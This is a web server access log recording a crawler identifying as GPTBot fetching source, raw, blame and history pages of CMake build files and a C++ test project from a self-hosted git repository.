"/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10007] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10005] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10004] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14726] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14727] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14726] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11305] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11307] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21336] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21336] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11306] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21336] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10230] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10251] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10232] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21356] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10663] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31152] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31149] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10664] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31153] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10664] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" -[17/Feb/2026:15:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10469] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10469] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10468] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10467] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10469] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" -[17/Feb/2026:15:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" -[17/Feb/2026:15:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" -[17/Feb/2026:15:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" -[17/Feb/2026:15:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr 